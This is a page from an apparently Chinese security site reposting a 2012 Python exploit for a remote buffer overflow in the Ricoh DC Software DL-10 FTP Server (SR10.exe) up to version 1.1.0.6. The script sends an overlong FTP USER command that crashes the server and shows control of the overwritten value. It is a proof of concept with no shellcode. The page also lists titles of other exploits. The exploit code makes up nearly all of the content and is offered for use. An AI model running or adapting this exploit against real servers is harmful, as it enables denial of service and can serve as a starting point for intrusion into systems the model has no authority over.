Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow

来源：www.inshell.net 作者：Ahrens 发布时间：2012-03-23

#!/usr/bin/python
# Exploit Title: Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow Vulnerability
# Version:       <= 1.1.0.6
# Date:          2012-02-05
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.ricohpmmc.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Capftpd (former SR-10) is vulnerable too
# Howto:         "Log file name" has to be set
import socket,sys
import os
target="192.168.0.1"
port=21
junk1 = "\x41" * 245
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 50
payload = junk1 + boom + junk2
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)
s.recv(1024)
print "[*] Sending malformed request..."
s.send('USER ' + payload + '\r\n')
print "[!] Exploit has been sent!\n"
s.close()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告